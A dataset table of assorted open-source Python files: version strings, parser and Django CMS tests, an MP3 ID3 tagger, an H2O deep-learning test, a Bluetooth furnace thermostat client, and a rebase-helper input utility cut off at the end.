text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
|---|---|---|---|---|---|---|
# Make sure to update package.json, too!
version_info = (4, 3, 0)
__version__ = '.'.join(map(str, version_info))
|
unnikrishnankgs/va
|
venv/lib/python3.5/site-packages/nbformat/_version.py
|
Python
|
bsd-2-clause
| 113
| 0
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#Author: Tim Henderson
#Email: tim.tadh@hackthology.com
#For licensing see the LICENSE file in the top level directory.
from predictive import parse
def t_expr_compound():
assert (4*3/2) == parse('4*3/2')
assert (4/2*3) == parse('4/2*3')
assert ((3+9)*4/8) == parse('(3+9)*4/8')
assert (((9-3)*(5-3))/2 + 2) == parse('((9-3)*(5-3))/2 + 2')
assert (5 * 4 / 2 - 10 + 5 - 2 + 3) == parse('5 * 4 / 2 - 10 + 5 - 2 + 3')
assert (5 / 4 * 2 + 10 - 5 * 2 / 3) == parse('5 / 4 * 2 + 10 - 5 * 2 / 3')
|
timtadh/PyOhio2011
|
t_predictive.py
|
Python
|
bsd-3-clause
| 562
| 0.007117
|
import urllib2
import eyed3
import mechanize
import os
from bs4 import BeautifulSoup as bs
import unicodedata as ud
import sys
import string
reload(sys)
sys.setdefaultencoding('utf-8')
class Song:
def __init__(self, keyword, filename, albumart, aaformat, dd='/home/praneet/Music/'):
self.info = keyword.split('@')
self.filename = os.path.join(dd, filename).encode('utf-8')
self.keyword = urllib2.quote(('').join(self.info))
self.albumart = albumart
self.aaformat = aaformat
self.album = ''
self.artist = string.capwords(self.info[1])
self.title = self.info[0]
self.feat = ' '
self.genre = 'Unknown'
self.dd = dd
self.fetchID3()
def fetchID3(self):
browser = mechanize.Browser()
browser.set_handle_robots(False)
browser.addheaders = [('User-agent','Mozilla')]
searchURL = "https://www.google.co.in/search?site=imghp&source=hp&biw=1414&bih=709&q="+urllib2.quote(self.title+' '+self.artist+' song')
html = browser.open(searchURL)
soup = bs(html, 'html.parser')
souplist = soup.findAll(attrs={'class':'_o0d'})
for i in range(1,len(souplist)):
if souplist[i].get_text().split(':')[0].lower() == 'album' or souplist[i].get_text().split(':')[0].lower() == 'movie':
self.album = souplist[i].get_text().split(':')[1]
print 'album ',souplist[i].get_text().split(':')[1]
elif souplist[i].get_text().split(':')[0].lower() == 'artist' or souplist[i].get_text().split(':')[0].lower() == 'artists':
self.artist = souplist[i].get_text().split(':')[1]
print 'artist ',souplist[i].get_text().split(':')[1]
elif souplist[i].get_text().split(':')[0].lower() == 'genre' or souplist[i].get_text().split(':')[0].lower() == 'genres':
self.genre = souplist[i].get_text().split(':')[1]
print 'genre ',souplist[i].get_text().split(':')[1]
elif souplist[i].get_text().split(':')[0].lower() == 'featured artist' or souplist[i].get_text().split(':')[0].lower() == 'featured artists':
self.feat = souplist[i].get_text().split(':')[1]
print 'featured artist ',souplist[i].get_text().split(':')[1]
else:
pass
self.fetchalbum()
def fetchalbum(self):
browser = mechanize.Browser()
browser.set_handle_robots(False)
browser.addheaders = [('User-agent','Mozilla')]
searchURL = "https://www.google.co.in/search?site=imghp&source=hp&biw=1414&bih=709&q="+urllib2.quote(self.title+' '+self.artist+' album name')
html = browser.open(searchURL)
soup = bs(html, 'html.parser')
for i in soup.findAll(attrs={'class':'_B5d'}):
if self.album == '':
self.album = i.get_text()
print self.album
break
if self.album == '':
if not self.info[2].isspace() and self.info[2] != '':
self.album = string.capwords(self.info[2])
else:
self.album = self.title + '- Single'
print 'album', self.album
def updateID3(self):
audiofile = eyed3.load(self.filename)
try:
audiofile.tag.artist = unicode(self.artist, "utf-8")
except:
audiofile.tag.artist = self.artist
try:
audiofile.tag.album = unicode(self.album, "utf-8")
except:
audiofile.tag.album = self.album
title = ''
if self.feat == ' ':
title = self.title
else:
title = self.title+' ft. '+self.feat
try:
audiofile.tag.title = unicode(title, "utf-8")
except:
audiofile.tag.title = title
try:
audiofile.tag.genre = unicode(self.genre, "utf-8")
except:
audiofile.tag.genre = self.genre
audiofile.tag.images.set(3, open(self.albumart,'rb').read(), 'image/'+self.aaformat)
audiofile.tag.save()
if not os.path.isfile(self.dd+title+'.mp3'):
os.rename(self.filename, self.dd+title.rstrip()+'.mp3')
else:
newTitle = raw_input('Similar file already exits, enter new file name: ')
os.rename(self.filename, self.dd+newTitle.rstrip()+'.mp3')
print 'update complete'
os.remove(self.albumart)
# newsong = Song('Rockabye','Rockabye.mp3', 'rockabye','rockabye album art.jpeg','jpeg')
# newsong.updateID3()
|
praneetmehta/FSMD
|
ID3update.py
|
Python
|
mit
| 3,922
| 0.031362
|
# -*- coding: utf-8 -*-
from __future__ import with_statement
from cms.api import create_page, create_title
from cms.apphook_pool import apphook_pool
from cms.appresolver import (applications_page_check, clear_app_resolvers,
get_app_patterns)
from cms.test_utils.testcases import CMSTestCase
from cms.test_utils.util.context_managers import SettingsOverride
from django.contrib.auth.models import User
from django.core.urlresolvers import clear_url_caches, reverse
import sys
APP_NAME = 'SampleApp'
APP_MODULE = "cms.test_utils.project.sampleapp.cms_app"
class ApphooksTestCase(CMSTestCase):
def setUp(self):
clear_app_resolvers()
clear_url_caches()
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
def tearDown(self):
clear_app_resolvers()
clear_url_caches()
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
def test_explicit_apphooks(self):
"""
Test explicit apphook loading with the CMS_APPHOOKS setting.
"""
apphooks = (
'%s.%s' % (APP_MODULE, APP_NAME),
)
with SettingsOverride(CMS_APPHOOKS=apphooks):
apphook_pool.clear()
hooks = apphook_pool.get_apphooks()
app_names = [hook[0] for hook in hooks]
self.assertEqual(len(hooks), 1)
self.assertEqual(app_names, [APP_NAME])
apphook_pool.clear()
def test_implicit_apphooks(self):
"""
Test implicit apphook loading with INSTALLED_APPS + cms_app.py
"""
apps = ['cms.test_utils.project.sampleapp']
with SettingsOverride(INSTALLED_APPS=apps, ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'):
apphook_pool.clear()
hooks = apphook_pool.get_apphooks()
app_names = [hook[0] for hook in hooks]
self.assertEqual(len(hooks), 1)
self.assertEqual(app_names, [APP_NAME])
apphook_pool.clear()
def test_apphook_on_root(self):
with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin')
page = create_page("apphooked-page", "nav_playground.html", "en",
created_by=superuser, published=True, apphook="SampleApp")
blank_page = create_page("not-apphooked-page", "nav_playground.html", "en",
created_by=superuser, published=True, apphook="", slug='blankapp')
english_title = page.title_set.all()[0]
self.assertEquals(english_title.language, 'en')
create_title("de", "aphooked-page-de", page, apphook="SampleApp")
self.assertTrue(page.publish())
self.assertTrue(blank_page.publish())
response = self.client.get(self.get_pages_root())
self.assertTemplateUsed(response, 'sampleapp/home.html')
response = self.client.get('/en/blankapp/')
self.assertTemplateUsed(response, 'nav_playground.html')
apphook_pool.clear()
def test_apphook_on_root_reverse(self):
with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin')
page = create_page("apphooked-page", "nav_playground.html", "en",
created_by=superuser, published=True, apphook="SampleApp")
create_title("de", "aphooked-page-de", page, apphook="SampleApp")
self.assertTrue(page.publish())
self.assertFalse(reverse('sample-settings').startswith('//'))
apphook_pool.clear()
def test_get_page_for_apphook(self):
with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.second_urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin')
page = create_page("home", "nav_playground.html", "en",
created_by=superuser, published=True)
create_title('de', page.get_title(), page)
child_page = create_page("child_page", "nav_playground.html", "en",
created_by=superuser, published=True, parent=page)
create_title('de', child_page.get_title(), child_page)
child_child_page = create_page("child_child_page", "nav_playground.html",
"en", created_by=superuser, published=True, parent=child_page, apphook='SampleApp')
create_title("de", child_child_page.get_title(), child_child_page, apphook='SampleApp')
child_child_page.publish()
# publisher_public is set to draft on publish, issue with onetoone reverse
child_child_page = self.reload(child_child_page)
en_title = child_child_page.publisher_public.get_title_obj('en')
path = reverse('en:sample-settings')
request = self.get_request(path)
request.LANGUAGE_CODE = 'en'
attached_to_page = applications_page_check(request, path=path[1:]) # strip leading slash
self.assertEquals(attached_to_page.pk, en_title.page.pk)
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/home.html')
self.assertContains(response, en_title.title)
de_title = child_child_page.publisher_public.get_title_obj('de')
path = reverse('de:sample-settings')
request = self.get_request(path)
request.LANGUAGE_CODE = 'de'
attached_to_page = applications_page_check(request, path=path[4:]) # strip leading slash and language prefix
self.assertEquals(attached_to_page.pk, de_title.page.pk)
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/home.html')
self.assertContains(response, de_title.title)
apphook_pool.clear()
def test_include_urlconf(self):
with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.second_urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin')
page = create_page("home", "nav_playground.html", "en",
created_by=superuser, published=True)
create_title('de', page.get_title(), page)
child_page = create_page("child_page", "nav_playground.html", "en",
created_by=superuser, published=True, parent=page)
create_title('de', child_page.get_title(), child_page)
child_child_page = create_page("child_child_page", "nav_playground.html",
"en", created_by=superuser, published=True, parent=child_page, apphook='SampleApp')
create_title("de", child_child_page.get_title(), child_child_page, apphook='SampleApp')
child_child_page.publish()
path = reverse('extra_second')
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/extra.html')
self.assertContains(response, "test included urlconf")
path = reverse('extra_first')
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/extra.html')
self.assertContains(response, "test urlconf")
path = reverse('de:extra_first')
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/extra.html')
self.assertContains(response, "test urlconf")
path = reverse('de:extra_second')
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/extra.html')
self.assertContains(response, "test included urlconf")
apphook_pool.clear()
def test_apphook_breaking_under_home_with_new_path_caching(self):
with SettingsOverride(CMS_MODERATOR=False, CMS_PERMISSION=False):
home = create_page("home", "nav_playground.html", "en", published=True)
child = create_page("child", "nav_playground.html", "en", published=True, parent=home)
# not-home is what breaks stuff, because it contains the slug of the home page
not_home = create_page("not-home", "nav_playground.html", "en", published=True, parent=child)
create_page("subchild", "nav_playground.html", "en", published=True, parent=not_home, apphook='SampleApp')
urlpatterns = get_app_patterns()
resolver = urlpatterns[0]
url = resolver.reverse('sample-root')
self.assertEqual(url, 'child/not-home/subchild/')
|
hzlf/openbroadcast
|
website/cms/tests/apphooks.py
|
Python
|
gpl-3.0
| 9,529
| 0.006716
|
from django.conf.urls import patterns, url, include
from .views import GalleryListView, GalleryDetailView
urlpatterns = patterns("",
url(
regex=r"^gallery_list/$",
view=GalleryListView.as_view(),
name="gallery_list",
),
url(
regex=r"^gallery/(?P<pk>\d+)/$",
view=GalleryDetailView.as_view(),
name="gallery_detail",
),
)
|
ilendl2/chrisdev-cookiecutter
|
{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/photos/urls.py
|
Python
|
bsd-3-clause
| 387
| 0.002584
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Flag related helpers for sole tenancy related commands."""
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.compute import scope as compute_scope
SOLE_TENANCY_HOST_TYPE_RESOLVER = compute_flags.ResourceResolver.FromMap(
'sole tenancy host type', {
compute_scope.ScopeEnum.ZONE: 'compute.hostTypes'})
|
Sorsly/subtle
|
google-cloud-sdk/lib/googlecloudsdk/command_lib/compute/sole_tenancy/sole_tenancy_hosts/flags.py
|
Python
|
mit
| 967
| 0
|
import unittest, time, sys, re
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_nn, h2o_cmd, h2o_browse as h2b, h2o_import as h2i, h2o_gbm
def write_syn_dataset(csvPathname, rowCount, rowDataTrue, rowDataFalse, outputTrue, outputFalse):
dsf = open(csvPathname, "w+")
for i in range(int(rowCount/2)):
dsf.write(rowDataTrue + ',' + outputTrue + "\n")
for i in range(int(rowCount/2)):
dsf.write(rowDataFalse + ',' + outputFalse + "\n")
dsf.close()
class test_NN_twovalues(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
# fails with 3
global SEED
SEED = h2o.setup_random_seed()
h2o.init(1, java_heap_GB=4)
# h2b.browseTheCloud()
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud(h2o.nodes)
def test_DeepLearning_twovalues(self):
SYNDATASETS_DIR = h2o.make_syn_dir()
csvFilename = "syn_twovalues.csv"
csvPathname = SYNDATASETS_DIR + '/' + csvFilename
rowDataTrue = "1, 0, 65, 1, 2, 1, 1, 4, 1, 4, 1, 4"
rowDataFalse = "0, 1, 0, -1, -2, -1, -1, -4, -1, -4, -1, -4"
twoValueList = [
('A','B',0, 14),
('A','B',1, 14),
(0,1,0, 12),
(0,1,1, 12),
(0,1,'NaN', 12),
(1,0,'NaN', 12),
(-1,1,0, 12),
(-1,1,1, 12),
(-1e1,1e1,1e1, 12),
(-1e1,1e1,-1e1, 12),
]
trial = 0
for (outputTrue, outputFalse, case, coeffNum) in twoValueList:
write_syn_dataset(csvPathname, 20,
rowDataTrue, rowDataFalse, str(outputTrue), str(outputFalse))
start = time.time()
hex_key = csvFilename + "_" + str(trial)
model_key = 'trial_' + str(trial) + '.hex'
validation_key = hex_key
parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=hex_key)
print "using outputTrue: %s outputFalse: %s" % (outputTrue, outputFalse)
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'])
print "\n" + csvPathname, \
" numRows:", "{:,}".format(inspect['numRows']), \
" numCols:", "{:,}".format(inspect['numCols'])
response = inspect['numCols']
response = 'C' + str(response)
kwargs = {
'ignored_cols' : None,
'response' : response,
'classification' : 1,
'activation' : 'Tanh',
#'input_dropout_ratio' : 0.2,
'hidden' : '113,71,54',
'rate' : 0.01,
'rate_annealing' : 1e-6,
'momentum_start' : 0,
'momentum_stable' : 0,
'l1' : 0.0,
'l2' : 1e-6,
'seed' : 80023842348,
'loss' : 'CrossEntropy',
#'max_w2' : 15,
'initial_weight_distribution' : 'UniformAdaptive',
#'initial_weight_scale' : 0.01,
'epochs' : 100,
'destination_key' : model_key,
'validation' : hex_key,
}
timeoutSecs = 60
start = time.time()
h2o_cmd.runDeepLearning(parseResult=parseResult, timeoutSecs=timeoutSecs, **kwargs)
print "trial #", trial, "Deep Learning end on ", csvFilename, ' took', time.time() - start, 'seconds'
#### Now score using the model, and check the validation error
expectedErr = 0.00
relTol = 0.01
predict_key = 'Predict.hex'
kwargs = {
'data_key': validation_key,
'destination_key': predict_key,
'model_key': model_key
}
predictResult = h2o_cmd.runPredict(timeoutSecs=timeoutSecs, **kwargs)
h2o_cmd.runInspect(key=predict_key, verbose=True)
kwargs = {
}
predictCMResult = h2o.nodes[0].predict_confusion_matrix(
actual=validation_key,
vactual=response,
predict=predict_key,
vpredict='predict',
timeoutSecs=timeoutSecs, **kwargs)
cm = predictCMResult['cm']
print h2o_gbm.pp_cm(cm)
actualErr = h2o_gbm.pp_cm_summary(cm)/100.
print "actual classification error:" + format(actualErr)
print "expected classification error:" + format(expectedErr)
if actualErr != expectedErr and abs((expectedErr - actualErr)/expectedErr) > relTol:
raise Exception("Scored classification error of %s is not within %s %% relative error of %s" %
(actualErr, float(relTol)*100, expectedErr))
trial += 1
if __name__ == '__main__':
h2o.unit_main()
|
rowhit/h2o-2
|
py/testdir_single_jvm/test_NN2_twovalues.py
|
Python
|
apache-2.0
| 5,312
| 0.012236
|
#! /usr/bin/env python
import bluetooth
import subprocess
import re
import time
import string
import pywapi
import httplib
import ast
import socket
import ConfigParser
import io
from datetime import datetime, date
from time import mktime
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
from ssl import SSLError
from socket import error as SocketError
class Config:
"""Holds basic settings as well as current state"""
def __init__(self):
c = ConfigParser.RawConfigParser()
c.read('.furnace.cfg')
self.bluetooth_addr = c.get('relay', 'bluetooth_addr')
self.bluetooth_port = c.getint('relay', 'bluetooth_port')
self.relay_channels = c.getint('relay', 'channels')
self.primary_furnace = c.getint('relay', 'primary_furnace')
self.base_url = c.get('url', 'base_url')
self.secret = c.get('url', 'secret')
self.zip_code = c.get('house', 'zip_code')
self.room = c.get('house', 'room')
self.home_status = ''
self.mode = ''
self.last_time_home=0
self.indoor_temp_target=0
self.indoor_temp_target_dict={}
self.default_temp_day=c.getint('default_temp', 'day')
self.default_temp_night=c.getint('default_temp', 'night')
self.default_temp_away=c.getint('default_temp', 'away')
presence_devices=c.items('devices')
presence_devices_wifi=[]
for device in presence_devices:
presence_devices_wifi.append(dict(owner=device[0], ip_address=device[1], timestamp=0))
self.presence_devices_wifi = presence_devices_wifi
def write(self):
c = ConfigParser.RawConfigParser()
c.write('.furnace.cfg')
def ping(ip_address):
"""Determines if a certain IP address is currently used on our network
(to determine device presence)."""
try:
ping = subprocess.Popen(["nmap", "-sP", ip_address], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, error = ping.communicate()
received=-1
if out:
try:
received=int(re.findall(r"(\d+) host up", out)[0])
except:
received=0
else:
print 'No response from nmap'
except subprocess.CalledProcessError:
print "Couldn't get a ping"
return received
def getTarget(config, indoor_temp):
"""Defines the target temperature and current operating mode (target temp,
day default, night default)."""
now = datetime.now()
home_status = config.home_status
indoor_temp_target_dict = config.indoor_temp_target_dict
print "%s:%s" % (string.zfill(now.hour,2), string.zfill(now.minute,2))
utimestamp=mktime(datetime.now().utctimetuple())
default_temp_day = config.default_temp_day
default_temp_night = config.default_temp_night
default_temp_away = config.default_temp_away
default_temp_mode = ''
config.mode = ''
try:
default_temp = indoor_temp_target_dict['default_temperature']
default_temp_mode = indoor_temp_target_dict['default_temperature_mode']
target_timestamp = indoor_temp_target_dict['date'] + indoor_temp_target_dict['start_minutes'] * 60
target_end_timestamp = indoor_temp_target_dict['date'] + indoor_temp_target_dict['start_minutes'] * 60 + indoor_temp_target_dict['held_minutes'] * 60
if target_end_timestamp > utimestamp:
time_to_target = int(round((target_timestamp - utimestamp) / 60))
time_to_end = int(round((target_end_timestamp - utimestamp) / 60))
if target_timestamp > utimestamp:
print "we've got a target coming up in %s minutes" % time_to_target
# we need about 2 minutes per degree Celsius
if time_to_target <= 0 or time_to_target * 2 <= indoor_temp_target_dict['temperature'] - indoor_temp:
config.indoor_temp_target = indoor_temp_target_dict['temperature']
config.mode = 'timer'
print "setting target to %s degrees Celsius for %s more minutes" % (indoor_temp_target_dict['temperature'], time_to_end)
except KeyError:
print "no target set"
if config.mode != 'timer':
# TODO: make the time periods configurable in the interface
if datetime.today().isoweekday() <= 5:
# Week day
if home_status=='away':
config.mode='away'
if config.mode == default_temp_mode and default_temp != default_temp_away:
config.indoor_temp_target = default_temp
print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
config.default_temp_away = default_temp
else:
config.indoor_temp_target=default_temp_away
elif (0 <= now.hour < 7) and home_status=='home':
config.mode='night'
if config.mode == default_temp_mode and default_temp != default_temp_night:
config.indoor_temp_target = default_temp
print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
config.default_temp_night = default_temp
else:
config.indoor_temp_target = default_temp_night
elif 7 <= now.hour and home_status=='home':
config.mode='day'
if config.mode == default_temp_mode and default_temp != default_temp_day:
config.indoor_temp_target = default_temp
print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
config.default_temp_day = default_temp
else:
config.indoor_temp_target = default_temp_day
else:
# Weekend
if home_status=='away':
config.mode='away'
if config.mode == default_temp_mode and default_temp != default_temp_away:
config.indoor_temp_target = default_temp
print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
config.default_temp_away = default_temp
else:
config.indoor_temp_target=default_temp_away
elif (0 <= now.hour < 8) and home_status=='home':
config.mode='night'
if config.mode == default_temp_mode and default_temp != default_temp_night:
config.indoor_temp_target = default_temp
print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
config.default_temp_night = default_temp
else:
config.indoor_temp_target = default_temp_night
elif 8 <= now.hour and home_status=='home':
config.mode='day'
if config.mode == default_temp_mode and default_temp != default_temp_day:
config.indoor_temp_target = default_temp
print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp)
config.default_temp_day = default_temp
else:
config.indoor_temp_target = default_temp_day
config.write
return config
def checkPresence(config):
"""Pings all configured devices to determine who's at home"""
no_of_users_at_home=0
last_time_home=config.last_time_home
now = mktime(datetime.now().utctimetuple())
for device in config.presence_devices_wifi:
if device['timestamp'] >= now - 600:
print "Assuming %s is still at home" % device['owner']
no_of_users_at_home+=1
if no_of_users_at_home == 0:
for device in config.presence_devices_wifi:
if ping(device['ip_address']) > 0:
print "%s seems to be at home" % device['owner']
device['timestamp']=now
last_time_home=now
no_of_users_at_home+=1
if no_of_users_at_home > 0:
home_status='home'
else:
home_status='away'
else:
home_status='home'
return last_time_home, home_status, config.presence_devices_wifi
def btConnection(config, sendchar = 'n', close_after = True):
"""Creates a bluetooth connection to the relay, sends a command and returns
the result"""
print("opening Bluetooth connection")
i = 1
timed_out = False
while True:
try:
furnace_socket=bluetooth.BluetoothSocket( bluetooth.RFCOMM )
if furnace_socket.getpeername()[0] != config.bluetooth_addr:
furnace_socket.connect((config.bluetooth_addr, config.bluetooth_port))
furnace_socket.settimeout(10)
print "Bluetooth connected"
furnace_socket.send(sendchar+'[')
response_byte = furnace_socket.recv(1)
break
except bluetooth.btcommon.BluetoothError as error:
print(".")
print error
time.sleep(1)
i += 1
if i >= 30 and sendchar != '':
timed_out = True
break
if close_after:
print("closing Bluetooth connection")
furnace_socket.close()
if not timed_out:
response_bin = bin(ord(response_byte))[2:].zfill(config.relay_channels)
response_bit_list = map(int, list(response_bin))
response_bit_list.reverse()
return response_bit_list
else:
return False
def turnOnFurnace(config, furnace_no):
"""turns on a furnace using the bluetooth relay"""
channels = config.relay_channels
if furnace_no <= channels:
relaychar = chr(101+furnace_no)
elif furnace_no == channels + 1:
relaychar = 'd'
else:
print("Error: no such furnace!")
#raise
furnace_state = btConnection(config, relaychar, close_after=False)
if furnace_state:
if furnace_state[furnace_no]:
print("furnace %s turned on") % furnace_no
elif sum(furnace_state) == channels:
print("all furnaces turned on")
else:
print("Error: furnace has not been turned on!")
#raise
else:
print("Error: furnace has not been turned on!")
#raise
return furnace_state
def turnOffFurnace(config, furnace_no):
"""turns off a furnace using the bluetooth relay"""
channels = config.relay_channels
if furnace_no <= channels:
relaychar = chr(111+furnace_no)
elif furnace_no == channels + 1:
relaychar = 'n'
else:
print("Error: no such furnace!")
#raise
furnace_state = btConnection(config, relaychar, close_after=True)
if furnace_state[furnace_no]:
print("Error: furnace has not been turned off!")
#raise
elif sum(furnace_state) == 0:
print("all furnaces turned off")
else:
print("furnace %s turned off") % furnace_no
return furnace_state
def checkOutdoorTemp(zip_code):
"""Gets outdoor temperature for our ZIP code from Yahoo!"""
try:
yahoo_com_result = pywapi.get_weather_from_yahoo( zip_code, units = 'metric' )
outdoor_temperature = int(yahoo_com_result['condition']['temp'])
except (KeyError, AttributeError, httplib.BadStatusLine):
outdoor_temperature = 0
return outdoor_temperature
def checkIndoorTemp(config):
"""Gets indoor temperature from USB thermometer using command line tool"""
# repeat forever - temper is very flaky
tries = 0
while True:
tries += 1
try:
indoor_temp = float(subprocess.Popen("/usr/local/bin/temper", stdout=subprocess.PIPE).communicate()[0])
break
except ValueError:
print "Oops! Did not get a temperature. Trying again..."
if tries == 10:
# better turn off the furnace, probably an issue with the USB device
turnOffFurnace(config, config.primary_furnace)
return indoor_temp
def transmit(config, outdoor_temp, indoor_temp):
"""Transmits the current state to the server for reporting and gets targets
set in the web GUI (if any exist)"""
furnace_state=config.furnace_state
primary_furnace=config.primary_furnace
indoor_temp_target_dict={}
# round up or down to half degrees C
rounded_indoor_temp = round(indoor_temp*10/5)/2
print "It is %s degrees Celsius - target is %s (outdoors it's %s degrees Celsius)" % (rounded_indoor_temp, config.indoor_temp_target, outdoor_temp)
values = { 't' : indoor_temp,
'g' : config.indoor_temp_target,
'h' : config.home_status,
'f' : furnace_state[primary_furnace],
'r' : config.room,
's' : config.secret,
'o' : outdoor_temp,
'm' : config.mode }
try:
data = urlencode(values)
req = Request(config.base_url, data)
response = urlopen(req)
indoor_temp_target_dict = ast.literal_eval(response.read())
except HTTPError as e:
print 'The server couldn\'t fulfill the request.'
print 'Error code: ', e.code
except URLError as e:
print 'We failed to reach a server.'
print 'Reason: ', e.reason
except SSLError as e:
print 'We had an SSL error.'
except SocketError as e:
print 'Socket error'
if rounded_indoor_temp < config.indoor_temp_target and furnace_state[ primary_furnace ] == 0:
print "it is too cold"
furnace_state = turnOnFurnace(config, primary_furnace)
elif rounded_indoor_temp >= config.indoor_temp_target and furnace_state[ primary_furnace ] == 1:
print "it is warm enough"
furnace_state = turnOffFurnace(config, primary_furnace)
elif rounded_indoor_temp < config.indoor_temp_target and furnace_state[ primary_furnace ] == 1:
print "heating up"
elif rounded_indoor_temp >= config.indoor_temp_target and furnace_state[ primary_furnace ] == 0:
print "letting it cool down"
else:
print "weird state"
return furnace_state, indoor_temp_target_dict
def loop():
"""Main part of the client that repeats every 60 seconds"""
config = Config()
config.furnace_state = btConnection(config, 'n', close_after=False)
while True:
beforetime = mktime(datetime.now().utctimetuple())
config.last_time_home, config.home_status, config.presence_devices_wifi = checkPresence(config)
outdoor_temp=checkOutdoorTemp(config.zip_code)
indoor_temp=checkIndoorTemp(config)
config = getTarget(config, indoor_temp)
config.furnace_state, config.indoor_temp_target_dict=transmit(config, outdoor_temp, indoor_temp)
aftertime = mktime(datetime.now().utctimetuple())
if aftertime - beforetime >= 60:
sleeptime = 0
else:
sleeptime = 60 - (aftertime - beforetime)
time.sleep(sleeptime) # Delay the rest of 1 minute (60 seconds)
loop()
|
040medien/furnaceathome
|
furnace_client.py
|
Python
|
gpl-2.0
| 15,051
| 0.011694
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Creature()
result.template = "object/mobile/shared_dressed_binayre_ruffian_trandoshan_male_01.iff"
result.attribute_template_id = 9
result.stfName("npc_name","trandoshan_base_male")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
anhstudios/swganh
|
data/scripts/templates/object/mobile/shared_dressed_binayre_ruffian_trandoshan_male_01.py
|
Python
|
mit
| 472
| 0.04661
|
# -*- coding: utf-8 -*-
#
# This tool helps you rebase your package to the latest version
# Copyright (C) 2013-2019 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Authors: Petr Hráček <phracek@redhat.com>
# Tomáš Hozza <thozza@redhat.com>
# Nikola Forró <nforro@redhat.com>
# František Nečas <fifinecas@seznam.cz>
import logging
from typing import cast
from rebasehelper.logger import CustomLogger
logger: CustomLogger = cast(CustomLogger, logging.getLogger(__name__))
class InputHelper:
"""Class for command line interaction with the user."""
@staticmethod
def strtobool(message):
"""Converts a user message to a corresponding truth value.
This method is a replacement for deprecated strtobool from distutils,
its behaviour remains the same.
Args:
message (str): Message to evaluate.
Returns:
bool: True on 'y', 'yes', 't', 'true', 'on' and '1'.
False on 'n', 'no', 'f', 'false', 'off' and '0'.
Raises:
ValueError: On any other value.
"""
message = message.lower()
if message in ('y', 'yes', 't', 'true', 'on', '1'):
return True
elif message in ('n', 'no', 'f', 'false', 'off', '0'):
return False
raise ValueError('No conversion to truth value for "{}"'.format(message))
@classmethod
def get_message(cls, message, default_yes=True, any_input=False):
"""Prompts a user with yes/no message and gets the response.
Args:
message (str): Prompt string.
default_yes (bool): If the default value should be YES.
any_input (bool): Whether to return default value regardless of input.
Returns:
bool: True or False, based on user's input.
"""
if default_yes:
choice = '[Y/n]'
else:
choice = '[y/N]'
if any_input:
msg = '{0} '.format(message)
else:
msg = '{0} {1}? '.format(message, choice)
while True:
user_input = input(msg).lower()
if not user_input or any_input:
return True if default_yes else False
try:
user_input = cls.strtobool(user_input)
except ValueError:
logger.error('You have to type y(es) or n(o).')
continue
if any_input:
return True
else:
return bool(user_input)
|
rebase-helper/rebase-helper
|
